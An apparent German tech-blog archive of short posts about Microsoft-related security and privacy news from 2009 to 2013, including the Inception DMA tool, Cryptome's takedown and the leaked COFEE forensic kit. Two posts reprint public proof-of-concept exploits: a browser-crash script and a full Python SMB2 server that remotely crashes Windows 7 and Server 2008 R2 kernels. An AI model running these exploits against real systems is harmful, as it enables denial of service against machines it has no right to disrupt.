Archiv

Artikel Tagged ‘Microsoft’

Inception: IEEE 1394 SBP-2 DMA Exploiting kostenfrei

11. Januar 2013 6 Kommentare

Die beiden Kits Forensic Disk Decryptor von Elcomsoft oder Kit Forensic von Passware haben es bereits vorgemacht und nun kommt Inception, ein kostenfreies Tool fuerinception IEEE 1394 SBP-2 DMA Exploiting.

Wer nun noch nicht weiss worum es sich hierbei handelt, durch das SBP-2 DMA Exploiting ist es moeglich mit phsyiskalischem Zugriff auf einen Rechner nicht nur alle Passwoerter zurueckzusetzen sondern auch Zugriff auf verschluesselte Partitionen zu erhalten welche Beispielsweise mit  Truecrypt oder Bitlocker verschluesselt wurden.
Dies wird ermoeglicht da Zugriff auf die im Speicher befindlichen Passwoerter oder Keys durch deratige Angriffe ermoeglicht wird.

Inception kann hierzu ueber Firewire, Thunderbolt, ExpressCard, PC Card oder jedes andere PCI/PCIE Interface Mehr…

Cryptome ist tot – Es lebe Cryptome

26. Februar 2010 Keine Kommentare

In Zeiten von Wikileaks ist Cryptome sicherlich nicht mehr jedem bekannt, doch wenn es um Whistelblower Pages geht, dann ist Cryptome der Urvater dieser Seiten und diese Seite wurde gestern angeblich von Microsoft via einstweiliger Verfuegung offline genommen, soweit ist das aber nur die halbe Wahrheit, denn ein Mirror steht auf cryptomeorg.siteprotect.net zur Verfuegung und auch die Admins von Wikileaks bieten den Betreibern von Cryptome ihre Hilfe an.
Schoen wieder einmal zu sehen das sich die Netzgemeinde nicht einfach druecken laesst, schoen wenn auch in Deutschland diese Zeichen ankommen wuerden.
Konkret hat es MS nicht gefallen, das Cryptome vertrauliche Dokumente veroeffentlicht hatte, in denen der Umgang von MS mit Strafverfolgungsbehoerden aufgezeigt wurde.

Datenschuetzer wollen Einsatz von Google Analytics verhindern

25. November 2009 Keine Kommentare

So die Headline von einem Artikel der Zeit-Online, hier geht es wie man denken kann mal wieder gegen Google und deren angeblichen Datenspeicherwahn.
Die Bundesdatenschutzbeauftragten sind einstimmig der Meinung, dass Google Analytics gegen geltendes deutsches Recht verstossen wuerde und von daher auch mit der Androhung von Strafen verboten werden sollte.
Laut Xamit einer Bewertungsgesellschaft nutzen derzeit ueber 13 Prozent aller Deutschen Domains Analytics – darunter auch Arzneimittelanbieter, politische Parteien und Zeitungen.

Der Internetsurfer habe keine Möglichkeit, die Beobachtung durch Google aktiv abzulehnen („Opt-out“), argumentieren sie. „Ohne das Opt-out aber“, sagt Marit Hansen, stellvertretende Leiterin des Unabhängigen Landeszentrums für Datenschutz Schleswig-Holstein, „geht es gar nicht“. Und schließlich sei die Verarbeitung von Daten in den USA unzulässig.

Das ist der Satz der mich am meisten stoert, denn das ist so nicht richtig.
Die einfachste Moeglichkeit hier als armer Surfer einen Riegel vorzuschieben ist das Deaktivieren von Javascript, noscript fuer Firefox bietet hier ein tolles AddOn, mit dem sich auch ganze Domains einfach Blacklisten lassen.

In meinen Augen ist Google die letzte Bastion die etwas gegen MS ausrichten kann und dieser ganze Hickhack ueber die boese Datenkrake geht mir gehoerig auf die Nerven.

Wir koennen auch nur wenig gegen die Vorratsdatenspeicherung tun, ist diese wirklich soviel besser nur weil heir die Daten auf deutschen Servern gespeichert werden, sind diese denn wirklich vorm Zugriff boeser Gesellen aus diversen Schurkenstaaten und noch viel boeseren Untergrundmafiastrukturen geschuetzt? <ironie />

(Quelle: zeit online)

Schwachstelle in div. Browsern erlaubt Remote Execution

20. November 2009 2 Kommentare

Das Securityreason Team hat heute eine Schwachstelle released, welche die Opera Versionen Opera 10.01 bis 10.10 Beta betrifft, Firefox, Chrome, KDE ( konqueror), K-Melon und weitere.
Ueber die Luecke ist es moeglich den Browser zum Absturz zu bringen oder remote Kommandos auszufuehren.
Das Team hat folgenden PoC (Opera, weitere in der Quellenangabe) mitgeliefert:

<script>
var a=0.<?php echo str_repeat(„9“,299999); ?>;
</script>

(Quellen: Securityreason Opera
Securityreasons KDE Libs
Securityreasons K-Melon
Securityreasons Seamonkey)

Mark Cubans Plan Google zu schaden

16. November 2009 Keine Kommentare

Gerade im IRC die /. Story des Monats? bekommen.
Der Besitzer der Dallas Mavericks, plat Google zu „toeten“ indem er den Top 1.000 Seiten 1 Million Dollar zahlen moechte, wenn sie sich aus dem Googleindex austragen lassen und dafuer zu Microsoft gehen.

Die Fragen die sich mir hier stellen:

Hat der Mensch zuviel Geld und Langeweile?
1. April so spaet in diesem Jahr?
Oder !23 Verschwoerung! zahlt Microsoft Cuban 2 Mrd.?

(Quelle: slashdot)

Windows 7, Server 2008R2 Remote Kernel Crash

11. November 2009 Keine Kommentare

Laurent Gaffié meldete ein Sicherheitsproblem an Microsoft, jedoch wendete sich MS an den Autor und versuchte diesem zu verstehen zu geben, dass ein „multi-vendor-ipv6 bug“ nicht in einem Security Bulletin richtig aufgehoben ist.
Laurent released daher folgenden PoC (von mir nicht getestet):

–>
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
# caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
#crash
#Author: Laurent Gaffié

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()

#SDL FAILED
<-- Als Workaround wird empfohlen Samba Features und Ports zu schliessen. (Quelle: Laurents Blog)

MS Forensik Tool geleaked

11. November 2009 Keine Kommentare

Ein Forensik Tool welches von Microsoft speziell fuer Gesetzeshueter erstelllt wurde, ist auf einer File Sharing Site gelanded und somit ist die Gefahr gross, dass die Programme in die falschen Haende gelangen.
COFEE so der Name, ist eine Sammlung von USB basierten Programmen welche von Microsoft eigentlich nur in die Haende von Gesetzeshueter gegeben werden sollten um auch mit wenig oder garkeinen IT KnowHow Ermittlungen durchfuehren zu koennen.
Zwar wurde das Programm, welches mindestens auf einer FileSharing Site gefunden wurde, wieder von dieser entfernt, jedoch haben Sicherheitsexperten hier ein schlechtes Gefuehl, da das extrahieren einzelner Komponenten missbraucht werden koennte, wir werden sehen was hier noch passiert.

COFEE steht uebrigens fuer „Computer Online Forensic Evidence Extractor“
Toller Name, doch kein falscher Kaffee.

(Quelle: darkreading.com)